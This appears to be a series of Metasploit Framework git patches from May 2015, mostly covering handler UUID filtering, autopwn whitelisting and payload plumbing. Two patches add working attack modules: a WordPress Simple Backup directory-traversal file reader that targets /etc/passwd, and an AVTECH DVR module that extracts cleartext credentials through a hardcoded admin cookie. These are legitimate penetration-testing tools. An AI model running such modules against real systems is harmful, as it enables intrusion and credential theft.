 lib/msf/core/handler/reverse_http.rb | 8 +++++++-
 1 file changed, 7 insertions(+), 1 deletion(-)

diff --git a/lib/msf/core/handler/reverse_http.rb b/lib/msf/core/handler/reverse_http.rb
index d442d6727d..98de432c7e 100644
--- a/lib/msf/core/handler/reverse_http.rb
+++ b/lib/msf/core/handler/reverse_http.rb
@@ -56,7 +56,8 @@ module ReverseHttp
         OptAddress.new('ReverseListenerBindAddress', [ false, 'The specific IP address to bind to on the local system']),
         OptInt.new('ReverseListenerBindPort', [ false, 'The port to bind to on the local system if different from LPORT' ]),
         OptBool.new('OverrideRequestHost', [ false, 'Forces clients to connect to LHOST:LPORT instead of keeping original payload host', false ]),
-        OptString.new('HttpUnknownRequestResponse', [ false, 'The returned HTML response body when the handler receives a request that is not from a payload', '<html><body><h1>It works!</h1></body></html>'  ])
+        OptString.new('HttpUnknownRequestResponse', [ false, 'The returned HTML response body when the handler receives a request that is not from a payload', '<html><body><h1>It works!</h1></body></html>'  ]),
+        OptBool.new('IgnoreUnknownPayloads', [false, 'Whether to drop connections from payloads using unknown UUIDs', false])
       ], Msf::Handler::ReverseHttp)
   end
 
@@ -228,6 +229,11 @@ protected
       conn_id = generate_uri_uuid(URI_CHECKSUM_CONN, uuid)
     end
 
+    if datastore['IgnoreUnknownPayloads'] && ! framework.uuid_db[uuid.puid_hex]
+      print_status("#{cli.peerhost}:#{cli.peerport} Ignoring request with unknown UUID #{uuid.to_s}")
+      info[:mode] = :unknown_uuid
+    end
+
     self.pending_connections += 1
 
     # Process the requested resource.

From e07576ce2099906cbdcea541377ff86682a7c7c7 Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Wed, 20 May 2015 23:55:49 -0500
Subject: [PATCH 0141/1013] Indicate whether a session has a registered UUID

---
 lib/msf/base/serializer/readable_text.rb | 14 ++++++++++++++
 1 file changed, 14 insertions(+)

diff --git a/lib/msf/base/serializer/readable_text.rb b/lib/msf/base/serializer/readable_text.rb
index 7749515b92..c62db55496 100644
--- a/lib/msf/base/serializer/readable_text.rb
+++ b/lib/msf/base/serializer/readable_text.rb
@@ -589,8 +589,11 @@ class ReadableText
       sess_via     = session.via_exploit.to_s
       sess_type    = session.type.to_s
       sess_uuid    = session.payload_uuid.to_s
+      sess_puid    = session.payload_uuid.respond_to?(:puid_hex) ? session.payload_uuid.puid_hex : nil
+
       sess_checkin = "<none>"
       sess_machine_id = session.machine_id.to_s
+      sess_registration = "No"
 
       if session.respond_to? :platform
         sess_type << (" " + session.platform)
@@ -600,6 +603,13 @@ class ReadableText
         sess_checkin = "#{(Time.now.to_i - session.last_checkin.to_i)}s ago @ #{session.last_checkin.to_s}"
       end
 
+      if session.payload_uuid.respond_to?(:puid_hex) && (uuid_info = framework.uuid_db[sess_puid])
+        sess_registration = "Yes"
+        if uuid_info['name']
+          sess_registration << " - Name=\"#{uuid_info['name']}\""
+        end
+      end
+
       out << "  Session ID: #{sess_id}\n"
       out << "        Type: #{sess_type}\n"
       out << "        Info: #{sess_info}\n"
@@ -608,6 +618,10 @@ class ReadableText
       out << "        UUID: #{sess_uuid}\n"
       out << "   MachineID: #{sess_machine_id}\n"
       out << "     CheckIn: #{sess_checkin}\n"
+      out << "  Registered: #{sess_registration}\n"
+
+
+
       out << "\n"
     end
 

From 27406204ed818a1fd553ea6c482bd11d2f41fe2a Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Wed, 20 May 2015 23:56:15 -0500
Subject: [PATCH 0142/1013] Disable payload UUID registration by default

---
 lib/msf/core/payload/uuid/options.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/msf/core/payload/uuid/options.rb b/lib/msf/core/payload/uuid/options.rb
index c5d23cf2cf..d3131c2884 100644
--- a/lib/msf/core/payload/uuid/options.rb
+++ b/lib/msf/core/payload/uuid/options.rb
@@ -18,7 +18,7 @@ module Msf::Payload::UUID::Options
         Msf::OptString.new('PayloadUUIDSeed', [ false, 'A string to use when generating the payload UUID (deterministic)']),
         Msf::OptString.new('PayloadUUIDRaw', [ false, 'A hex string representing the raw 8-byte PUID value for the UUID']),
         Msf::OptString.new('PayloadUUIDName', [ false, 'A human-friendly name to reference this unique payload (requires tracking)']),
-        Msf::OptBool.new('PayloadUUIDTracking', [ true, 'Whether or not to automatically register generated UUIDs', true]),
+        Msf::OptBool.new('PayloadUUIDTracking', [ true, 'Whether or not to automatically register generated UUIDs', false]),
       ], self.class)
   end
 

From 6e8ee2f3baa2367ff31165591c30afc5ca6b4467 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Thu, 21 May 2015 00:05:14 -0500
Subject: [PATCH 0143/1013] Add whitelist feature

---
 lib/msf/core/exploit/browserautopwnv2.rb  | 19 +++++++++++++++++++
 modules/exploits/multi/browser/autopwn.rb |  3 ++-
 2 files changed, 21 insertions(+), 1 deletion(-)

diff --git a/lib/msf/core/exploit/browserautopwnv2.rb b/lib/msf/core/exploit/browserautopwnv2.rb
index cb9037274e..f41e940b74 100644
--- a/lib/msf/core/exploit/browserautopwnv2.rb
+++ b/lib/msf/core/exploit/browserautopwnv2.rb
@@ -394,6 +394,8 @@ module Msf
       super
       @bap_exploits = []
       @module_job_ids = []
+      # #split might be expensive if the file is really big
+      @whitelist = datastore['Whitelist'] ? datastore['Whitelist'].split : nil
 
       print_status("Searching BES exploits, please wait...")
       init_exploits
@@ -577,6 +579,23 @@ module Msf
     end
 
 
+    def on_request_uri(cli, request)
+      if @whitelist && !is_ip_targeted?(cli.peerhost)
+        print_status("Client is trying to connect but not on our whitelist.")
+        send_not_found(cli)
+        return
+      end
+
+      super
+    end
+
+
+    def is_ip_targeted?(cli_ip)
+      return unless @whitelist
+      @whitelist.include?(cli_ip)
+    end
+
+
     # Returns the HTML that serves our exploits.
     #
     # @param cli [Socket] Socket for the browser
diff --git a/modules/exploits/multi/browser/autopwn.rb b/modules/exploits/multi/browser/autopwn.rb
index f0ab961770..26e79ddd4b 100644
--- a/modules/exploits/multi/browser/autopwn.rb
+++ b/modules/exploits/multi/browser/autopwn.rb
@@ -34,7 +34,8 @@ class Metasploit3 < Msf::Exploit::Remote
         OptRegexp.new('Include', [false, 'Pattern search to include specific modules']),
         OptRegexp.new('Exclude', [false, 'Pattern search to exclude specific modules']),
         OptInt.new('MaxExploits', [false, 'Number of browser exploits to load', 20]),
-        OptString.new('Content', [false, 'HTML Content', ''])
+        OptString.new('Content', [false, 'HTML Content', '']),
+        OptAddressRange.new('Whitelist', [false, "A range of IPs you're interested in attacking"])
       ] ,self.class)
 
     deregister_options('Retries', 'DisablePayloadHandler', 'ContextInformationFile')

From 31c60b48c8f5c9cde22a39da5143ae93decfbe58 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Thu, 21 May 2015 00:08:04 -0500
Subject: [PATCH 0144/1013] Don't forget to doc

---
 lib/msf/core/exploit/browserautopwnv2.rb | 10 ++++++++++
 1 file changed, 10 insertions(+)

diff --git a/lib/msf/core/exploit/browserautopwnv2.rb b/lib/msf/core/exploit/browserautopwnv2.rb
index f41e940b74..4717bc93b5 100644
--- a/lib/msf/core/exploit/browserautopwnv2.rb
+++ b/lib/msf/core/exploit/browserautopwnv2.rb
@@ -579,6 +579,11 @@ module Msf
     end
 
 
+    # Handles client requests specific for BAP.
+    #
+    # @param cli [Socket] Socket for the browser
+    # @param request [Rex::Proto::Http::Request] The HTTP request sent by the browser
+    # @return [void]
     def on_request_uri(cli, request)
       if @whitelist && !is_ip_targeted?(cli.peerhost)
         print_status("Client is trying to connect but not on our whitelist.")
@@ -590,6 +595,11 @@ module Msf
     end
 
 
+    # Returns true if the IP is on our whitelist.
+    #
+    # @param [String] cli_ip Client's IP.
+    # @return [TrueClass] The IP is on the whitelist.
+    # @return [FalseClass] The IP is not on the whitelist.
     def is_ip_targeted?(cli_ip)
       return unless @whitelist
       @whitelist.include?(cli_ip)

From 4622fa60eb664b87eedc5ce3baa8d074df247452 Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Thu, 21 May 2015 00:22:41 -0500
Subject: [PATCH 0145/1013] Register the init_* URLs and whitelist these

---
 lib/msf/core/handler/reverse_http.rb | 20 ++++++++++++++++++--
 lib/msf/core/payload/uuid/options.rb | 20 +++++++++++++++++++-
 2 files changed, 37 insertions(+), 3 deletions(-)

diff --git a/lib/msf/core/handler/reverse_http.rb b/lib/msf/core/handler/reverse_http.rb
index 98de432c7e..c3c8954f86 100644
--- a/lib/msf/core/handler/reverse_http.rb
+++ b/lib/msf/core/handler/reverse_http.rb
@@ -154,6 +154,10 @@ module ReverseHttp
 
     print_status("Started #{scheme.upcase} reverse handler on #{listener_uri}")
     lookup_proxy_settings
+
+    if datastore['IgnoreUnknownPayloads']
+      print_status("Handler is ignoring unknown payloads, there are #{framework.uuid_db.keys.length} UUIDs whitelisted")
+    end
   end
 
   #
@@ -229,11 +233,21 @@ protected
       conn_id = generate_uri_uuid(URI_CHECKSUM_CONN, uuid)
     end
 
+    # Validate known UUIDs for all requests if IgnoreUnknownPayloads is set
     if datastore['IgnoreUnknownPayloads'] && ! framework.uuid_db[uuid.puid_hex]
-      print_status("#{cli.peerhost}:#{cli.peerport} Ignoring request with unknown UUID #{uuid.to_s}")
+      print_status("#{cli.peerhost}:#{cli.peerport} (UUID: #{uuid.to_s}) Ignoring request with unknown UUID")
       info[:mode] = :unknown_uuid
     end
 
+    # Validate known URLs for all session init requests if IgnoreUnknownPayloads is set
+    if datastore['IgnoreUnknownPayloads'] && info[:mode].to_s =~ /^init_/
+      allowed_urls = framework.uuid_db[uuid.puid_hex]['urls'] || []
+      unless allowed_urls.include?(req.relative_resource)
+        print_status("#{cli.peerhost}:#{cli.peerport} (UUID: #{uuid.to_s}) Ignoring request with unknown UUID URL #{req.relative_resource}")
+        info[:mode] = :unknown_uuid_url
+      end
+    end
+
     self.pending_connections += 1
 
     # Process the requested resource.
@@ -374,7 +388,9 @@ protected
         })
 
       else
-        print_status("#{cli.peerhost}:#{cli.peerport} Unknown request to #{req.relative_resource} #{req.inspect}...")
+        unless [:unknown_uuid, :unknown_uuid_url].include?(info[:mode])
+          print_status("#{cli.peerhost}:#{cli.peerport} Unknown request to #{req.relative_resource} with UA #{req.headers['User-Agent']}...")
+        end
         resp.code    = 200
         resp.message = "OK"
         resp.body    = datastore['HttpUnknownRequestResponse'].to_s
diff --git a/lib/msf/core/payload/uuid/options.rb b/lib/msf/core/payload/uuid/options.rb
index d3131c2884..f20233d031 100644
--- a/lib/msf/core/payload/uuid/options.rb
+++ b/lib/msf/core/payload/uuid/options.rb
@@ -42,7 +42,11 @@ module Msf::Payload::UUID::Options
       return "/" + generate_uri_checksum(sum, len, prefix="")
     end
 
-    generate_uri_uuid(sum, generate_payload_uuid, len)
+    uuid = generate_payload_uuid
+    uri  = generate_uri_uuid(sum, uuid, len)
+    record_payload_uuid_url(uuid, uri)
+
+    uri
   end
 
   # Generate a Payload UUID
@@ -68,6 +72,10 @@ module Msf::Payload::UUID::Options
       conf[:puid] = puid_raw
     end
 
+    if datastore['PayloadUUIDName'].to_s.length > 0 && ! datastore['PayloadUUIDTracking']
+      raise ArgumentError, "The PayloadUUIDName value is ignored unless PayloadUUIDTracking is enabled"
+    end
+
     # Generate the UUID object
     uuid = Msf::Payload::UUID.new(conf)
     record_payload_uuid(uuid)
@@ -98,5 +106,15 @@ module Msf::Payload::UUID::Options
     framework.uuid_db[uuid.puid_hex] = uuid_info
   end
 
+  # Store a UUID URL in the JSON database if tracking is enabled
+  def record_payload_uuid_url(uuid, url)
+    return unless datastore['PayloadUUIDTracking']
+    uuid_info = framework.uuid_db[uuid.puid_hex]
+    uuid_info['urls'] ||= []
+    uuid_info['urls'] << url
+    uuid_info['urls'].uniq!
+    framework.uuid_db[uuid.puid_hex] = uuid_info
+  end
+
 end
 

From 3ee02d3626f15fe3d53c97fbaf2a8c66cccea3b8 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Thu, 21 May 2015 00:36:40 -0500
Subject: [PATCH 0146/1013] Hmm bug

---
 lib/msf/core/exploit/browserautopwnv2.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/msf/core/exploit/browserautopwnv2.rb b/lib/msf/core/exploit/browserautopwnv2.rb
index 4717bc93b5..174a92cdfc 100644
--- a/lib/msf/core/exploit/browserautopwnv2.rb
+++ b/lib/msf/core/exploit/browserautopwnv2.rb
@@ -601,7 +601,7 @@ module Msf
     # @return [TrueClass] The IP is on the whitelist.
     # @return [FalseClass] The IP is not on the whitelist.
     def is_ip_targeted?(cli_ip)
-      return unless @whitelist
+      return true unless @whitelist
       @whitelist.include?(cli_ip)
     end
 

From eac1663fed840737189f903ed763553a724f0174 Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Thu, 21 May 2015 00:40:49 -0500
Subject: [PATCH 0147/1013] Ensure that the base directory exists before
 creating the file

---
 lib/rex/json_hash_file.rb | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/lib/rex/json_hash_file.rb b/lib/rex/json_hash_file.rb
index 196c5aadbb..00556efdfe 100644
--- a/lib/rex/json_hash_file.rb
+++ b/lib/rex/json_hash_file.rb
@@ -1,6 +1,7 @@
 # -*- coding => binary -*-
 
 require 'json'
+require 'fileutils'
 
 #
 # This class provides a thread-friendly hash file store in JSON format
@@ -15,6 +16,7 @@ class JSONHashFile
     @lock = Mutex.new
     @hash = {}
     @last = 0
+    ::FileUtils.mkdir_p(::File.dirname(path))
     synced_update
   end
 

From d9d8634948971b41e2fb974e111f66d5a13720fe Mon Sep 17 00:00:00 2001
From: erwanlr <erwan.lr@gmail.com>
Date: Thu, 21 May 2015 08:46:16 +0100
Subject: [PATCH 0148/1013] Changes the message displayed when vulnerable

---
 modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb b/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb
index 011e85351f..7aa1d270e6 100644
--- a/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb
+++ b/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb
@@ -155,7 +155,7 @@ class Metasploit3 < Msf::Auxiliary
       vmessage = "#{peer} - Checking #{uri} [#{res.code}]"
 
       if res && res.body.include?('Requested Range Not Satisfiable')
-        print_status("#{vmessage} - Vulnerable")
+        print_status("#{peer} - #{uri} is vulnerable")
 
         target_uri.path = uri # Needed for the DoS attack
 

From 356f361b40640b315a9efb235b848413b8617517 Mon Sep 17 00:00:00 2001
From: David Maloney <DMaloney@rapid7.com>
Date: Thu, 21 May 2015 09:30:09 -0500
Subject: [PATCH 0149/1013] add sid to the the yard docs

you win this round OJ ;)

MSP-12722
---
 lib/msf/core/rpc/v10/rpc_session.rb | 1 +
 1 file changed, 1 insertion(+)

diff --git a/lib/msf/core/rpc/v10/rpc_session.rb b/lib/msf/core/rpc/v10/rpc_session.rb
index a671d2a5d4..6ac49faa65 100644
--- a/lib/msf/core/rpc/v10/rpc_session.rb
+++ b/lib/msf/core/rpc/v10/rpc_session.rb
@@ -397,6 +397,7 @@ class RPC_Session < RPC_Base
 
   # Changes the Transport of a given Meterpreter Session
   #
+  # @param sid [Fixnum] The Session ID of the `Msf::Session`
   # @option opts [String] :transport The transport protocol to use (e.g. reverse_tcp, reverse_http, bind_tcp etc)
   # @option opts [String] :lhost  The LHOST of the listener to use
   # @option opts [String] :lport The LPORT of the listener to use

From 0135b3639f5bfebd565a619b9d586bec41e1d5aa Mon Sep 17 00:00:00 2001
From: Roberto Soares <robertoespreto@gmail.com>
Date: Thu, 21 May 2015 12:23:24 -0300
Subject: [PATCH 0150/1013] Add WordPress Simple Backup File Read
 Vulnerability.

---
 .../http/wp_simple_backup_file_read.rb        | 84 +++++++++++++++++++
 1 file changed, 84 insertions(+)
 create mode 100644 modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb

diff --git a/modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb b/modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb
new file mode 100644
index 0000000000..6f4f82b0af
--- /dev/null
+++ b/modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb
@@ -0,0 +1,84 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Auxiliary::Report
+  include Msf::HTTP::Wordpress
+  include Msf::Auxiliary::Scanner
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'WordPress Simple Backup File Read Vulnerability',
+      'Description'    => %q{
+        This module exploits a directory traversal vulnerability in WordPress Plugin
+        "Simple Backup" version 2.7.10, allowing to read arbitrary files with the
+        web server privileges.
+      },
+      'References'     =>
+        [
+          ['WPVDB', '7997'],
+          ['URL', 'http://packetstormsecurity.com/files/131919/']
+        ],
+      'Author'         =>
+        [
+          'Mahdi.Hidden', # Vulnerability Discovery
+          'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit Module
+        ],
+      'License'        => MSF_LICENSE
+    ))
+
+    register_options(
+      [
+        OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']),
+        OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 6 ])
+      ], self.class)
+  end
+
+  def check
+    check_plugin_version_from_readme('simple-backup', '2.7.11')
+  end
+
+  def run_host(ip)
+    traversal = "../" * datastore['DEPTH']
+    filename = datastore['FILEPATH']
+    filename = filename[1, filename.length] if filename =~ /^\//
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri'    => normalize_uri(wordpress_url_backend, 'tools.php'),
+      'vars_get' =>
+        {
+          'page'  => 'backup_manager',
+          'download_backup_file' => "#{traversal}#{filename}"
+        }
+    )
+
+    unless res && res.body
+      vprint_error("#{peer} - Server did not respond in an expected way.")
+      return
+    end
+
+    if res.code == 200 && res.body.length > 0 && res.headers['Content-Disposition'].include?('attachment; filename')
+
+      vprint_line("\n#{res.body}\n")
+      fname = datastore['FILEPATH']
+
+      path = store_loot(
+        'simplebackup.traversal',
+        'text/plain',
+        ip,
+        res.body,
+        fname
+      )
+
+      print_good("#{peer} - File saved in: #{path}")
+    else
+      print_error("#{peer} - Nothing was downloaded. You can try to change the DEPTH parameter.")
+    end
+  end
+end

From b4a6cdbad004da3d46cc6b6944e629814cf2ce02 Mon Sep 17 00:00:00 2001
From: Roberto Soares <robertoespreto@gmail.com>
Date: Thu, 21 May 2015 12:33:09 -0300
Subject: [PATCH 0151/1013] Remove new line in vprint_line.

---
 modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb b/modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb
index 6f4f82b0af..8cd632c729 100644
--- a/modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb
+++ b/modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb
@@ -65,7 +65,7 @@ class Metasploit3 < Msf::Auxiliary
 
     if res.code == 200 && res.body.length > 0 && res.headers['Content-Disposition'].include?('attachment; filename')
 
-      vprint_line("\n#{res.body}\n")
+      vprint_line("#{res.body}")
       fname = datastore['FILEPATH']
 
       path = store_loot(

From c7df2c7cf1e1227001251cb95a8ac4fddb2ca49c Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Thu, 21 May 2015 12:55:24 -0500
Subject: [PATCH 0152/1013] Update the gemspecs for recog 2.0 / mdm 1.2.0

---
 metasploit-framework-db.gemspec | 2 +-
 metasploit-framework.gemspec    | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/metasploit-framework-db.gemspec b/metasploit-framework-db.gemspec
index 5b261dbf35..d64792775f 100644
--- a/metasploit-framework-db.gemspec
+++ b/metasploit-framework-db.gemspec
@@ -31,7 +31,7 @@ Gem::Specification.new do |spec|
   # Metasploit::Credential database models
   spec.add_runtime_dependency 'metasploit-credential', '~> 1.0'
   # Database models shared between framework and Pro.
-  spec.add_runtime_dependency 'metasploit_data_models', '~> 1.0'
+  spec.add_runtime_dependency 'metasploit_data_models', '~> 1.2'
   # depend on metasploit-framewrok as the optional gems are useless with the actual code
   spec.add_runtime_dependency 'metasploit-framework', "= #{spec.version}"
   # Needed for module caching in Mdm::ModuleDetails
diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec
index 41d93d8c7c..d1a3e83638 100644
--- a/metasploit-framework.gemspec
+++ b/metasploit-framework.gemspec
@@ -74,7 +74,7 @@ Gem::Specification.new do |spec|
   # Run initializers for metasploit-concern, metasploit-credential, metasploit_data_models Rails::Engines
   spec.add_runtime_dependency 'railties'
   # required for OS fingerprinting
-  spec.add_runtime_dependency 'recog', '~> 1.0'
+  spec.add_runtime_dependency 'recog', '~> 2.0'
 
   # rb-readline doesn't work with Ruby Installer due to error with Fiddle:
   #   NoMethodError undefined method `dlopen' for Fiddle:Module

From e1f10772b352031e477699308850d127068f5bba Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Thu, 21 May 2015 16:30:42 -0500
Subject: [PATCH 0153/1013] Use create_cracked_credential

---
 .../auxiliary/scanner/ipmi/ipmi_dumphashes.rb | 26 +++++++------------
 1 file changed, 10 insertions(+), 16 deletions(-)

diff --git a/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb b/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb
index 5ec74e9c31..93e95ac91b 100644
--- a/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb
+++ b/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb
@@ -180,7 +180,7 @@ class Metasploit3 < Msf::Auxiliary
 
       # Write the rakp hash to the database
       hash = "#{rhost} #{username}:$rakp$#{sha1_salt}$#{sha1_hash}"
-      report_hash(username, hash)
+      core_id = report_hash(username, hash)
       # Write the vulnerability to the database
       unless reported_vuln
         report_vuln(
@@ -205,7 +205,7 @@ class Metasploit3 < Msf::Auxiliary
         print_good("#{rhost}:#{rport} - IPMI - Hash for user '#{username}' matches password '#{pass}'")
 
         # Report the clear-text credential to the database
-        report_cracked_cred(username, pass)
+        report_cracked_cred(username, pass, core_id)
         break
       end
     end
@@ -269,24 +269,18 @@ class Metasploit3 < Msf::Auxiliary
       status: Metasploit::Model::Login::Status::UNTRIED
     }.merge(service_data)
 
-    create_credential_login(login_data)
+    cl = create_credential_login(login_data)
+    cl.core_id
   end
 
-  def report_cracked_cred(user, password)
-    credential_data = {
-      module_fullname: self.fullname,
-      origin_type: :service,
-      private_data: password,
-      private_type: :password,
+  def report_cracked_cred(user, password, core_id)
+    cred_data = {
+      core_id: core_id,
       username: user,
-    }.merge(service_data)
+      password: password
+    }
 
-    login_data = {
-      core: create_credential(credential_data),
-      status: Metasploit::Model::Login::Status::UNTRIED
-    }.merge(service_data)
-
-    create_credential_login(login_data)
+    create_cracked_credential(cred_data)
   end
 
   #

From 9430d38a092412cccac8b4709e95292b927c45a8 Mon Sep 17 00:00:00 2001
From: Nicholas Starke <starke.nicholas@gmail.com>
Date: Thu, 21 May 2015 16:33:06 -0500
Subject: [PATCH 0154/1013] Adding AVTECH744_DVR Module

This module retrieves account information from
an AVTECH 744 DVR, including username, cleartext
password, account role, and the device PIN.
---
 .../gather/avtech744_dvr_account_retrieval.rb | 52 +++++++++++++++++++
 1 file changed, 52 insertions(+)
 create mode 100644 modules/auxiliary/gather/avtech744_dvr_account_retrieval.rb

diff --git a/modules/auxiliary/gather/avtech744_dvr_account_retrieval.rb b/modules/auxiliary/gather/avtech744_dvr_account_retrieval.rb
new file mode 100644
index 0000000000..e7cdfb5ed0
--- /dev/null
+++ b/modules/auxiliary/gather/avtech744_dvr_account_retrieval.rb
@@ -0,0 +1,52 @@
+require 'msf/core'
+
+    class Metasploit3 < Msf::Auxiliary
+
+        include Msf::Exploit::Remote::HttpClient
+
+        def initialize(info = {})
+            super(update_info(info,
+                'Name'           => 'AVTECH 744 DVR Account Information Retrieval',
+                'Description'    => %q{
+                    This module will extract the account information from the DVR,
+                    including all user's usernames and cleartext passwords plus
+                    the device PIN, along with a few other miscellaneous details.
+                },
+                'Author'         => [ 'nstarke' ],
+                'License'        => MSF_LICENSE
+            ))
+
+            register_options(
+                [
+                    Opt::RPORT(80),
+                ], self.class)
+        end
+
+
+        def run
+            res = send_request_cgi({
+               'method' => 'POST',
+               'uri' => '/cgi-bin/user/Config.cgi',
+               'cookie' => 'SSID=YWRtaW46YWRtaW4=;',
+               'vars_post' => {
+                    'action' => 'get',
+                    'category' => 'Account.*'
+                }
+            })
+
+            if (res != nil)
+                res.body.each_line { |line|
+                    split = line.split('=')
+                    key = split[0]
+                    value = split[1]
+                    if (key && value)
+                        print_good("#{key} - #{value}")
+                    end
+                }
+                p = store_loot('avtech744.dvr.accounts', 'text/plain', rhost, res.body)
+                print_good("avtech744.dvr.accounts stored in #{p}")
+            else
+                print_error("Unable to receive a response")
+            end
+        end
+    end

From 7a9e875a2511137fbce2d10f36576ea4387ad33b Mon Sep 17 00:00:00 2001
From: Tim <timrlw@gmail.com>
Date: Fri, 22 May 2015 05:21:08 +0100
Subject: [PATCH 0155/1013] use uuid aware generate_uri_uuid_mode

---
 modules/payloads/stagers/android/reverse_http.rb  | 4 +++-
 modules/payloads/stagers/android/reverse_https.rb | 4 +++-
 2 files changed, 6 insertions(+), 2 deletions(-)

diff --git a/modules/payloads/stagers/android/reverse_http.rb b/modules/payloads/stagers/android/reverse_http.rb
index 1830d5ae62..99c5359be8 100644
--- a/modules/payloads/stagers/android/reverse_http.rb
+++ b/modules/payloads/stagers/android/reverse_http.rb
@@ -5,6 +5,7 @@
 
 require 'msf/core'
 require 'msf/core/handler/reverse_http'
+require 'msf/core/payload/uuid_options'
 
 module Metasploit3
 
@@ -12,6 +13,7 @@ module Metasploit3
 
   include Msf::Payload::Stager
   include Msf::Payload::Dalvik
+  include Msf::Payload::UUIDOptions
 
   def initialize(info = {})
     super(merge_info(info,
@@ -37,7 +39,7 @@ module Metasploit3
     lurl = "ZZZZhttp://#{datastore["LHOST"]}"
     lurl << ":#{datastore["LPORT"]}" if datastore["LPORT"]
     lurl << "/"
-    lurl << generate_uri_checksum(Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INITJ, uri_req_len)
+    lurl << generate_uri_uuid_mode(:init_java, uri_req_len)
 
     classes = File.read(File.join(Msf::Config::InstallRoot, 'data', 'android', 'apk', 'classes.dex'), {:mode => 'rb'})
     string_sub(classes, 'ZZZZ' + ' ' * 512, lurl)
diff --git a/modules/payloads/stagers/android/reverse_https.rb b/modules/payloads/stagers/android/reverse_https.rb
index f1517bb1c1..9aa3b13bc8 100644
--- a/modules/payloads/stagers/android/reverse_https.rb
+++ b/modules/payloads/stagers/android/reverse_https.rb
@@ -5,6 +5,7 @@
 
 require 'msf/core'
 require 'msf/core/handler/reverse_https'
+require 'msf/core/payload/uuid_options'
 
 module Metasploit3
 
@@ -12,6 +13,7 @@ module Metasploit3
 
   include Msf::Payload::Stager
   include Msf::Payload::Dalvik
+  include Msf::Payload::UUIDOptions
 
   def initialize(info = {})
     super(merge_info(info,
@@ -37,7 +39,7 @@ module Metasploit3
     lurl = "ZZZZhttps://#{datastore["LHOST"]}"
     lurl << ":#{datastore["LPORT"]}" if datastore["LPORT"]
     lurl << "/"
-    lurl << generate_uri_checksum(Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INITJ, uri_req_len)
+    lurl << generate_uri_uuid_mode(:init_java, uri_req_len)
 
     classes = File.read(File.join(Msf::Config::InstallRoot, 'data', 'android', 'apk', 'classes.dex'), {:mode => 'rb'})
     string_sub(classes, 'ZZZZ' + ' ' * 512, lurl)

From 1c73c190fc845f52b4a19b5526b8afc39895c9a4 Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Fri, 22 May 2015 14:41:12 +1000
Subject: [PATCH 0156/1013] Add machine_id support to windows php meterp

---
 data/meterpreter/meterpreter.php                      | 11 ++++-------
 lib/rex/post/meterpreter/client_core.rb               |  5 +++++
 .../payloads/singles/php/meterpreter_reverse_tcp.rb   |  2 +-
 3 files changed, 10 insertions(+), 8 deletions(-)

diff --git a/data/meterpreter/meterpreter.php b/data/meterpreter/meterpreter.php
index 4d76383caf..b772b3e94c 100755
--- a/data/meterpreter/meterpreter.php
+++ b/data/meterpreter/meterpreter.php
@@ -449,13 +449,10 @@ function core_machine_id($req, &$pkt) {
   $serial = "";
 
   if (is_windows()) {
-    # TODO: need help from real PHP folks who know how to do
-    # things via the Windows API. We need to:
-    # 1) get the system volume
-    # 2) get the volume information for that volume.
-    # 3) get the serial number from the extracted volume info.
-    # 4) create a serial in the format:
-    # "{0:04x}-{1:04x}".format((serial_num >> 16) & 0xFFFF, serial_num & 0xFFFF)
+    # It's dirty, but there's not really a nicer way of doing this on windows. Make sure
+    # it's lowercase as this is what the other meterpreters use.
+    $output = strtolower(shell_exec("vol %SYSTEMDRIVE%"));
+    $serial = preg_replace('/.*serial number is ([a-z0-9]{4}-[a-z0-9]{4}).*/s', '$1', $output);
   } else {
     $serial = get_hdd_label();
   }
diff --git a/lib/rex/post/meterpreter/client_core.rb b/lib/rex/post/meterpreter/client_core.rb
index 17ee24e02d..2ed0d19202 100644
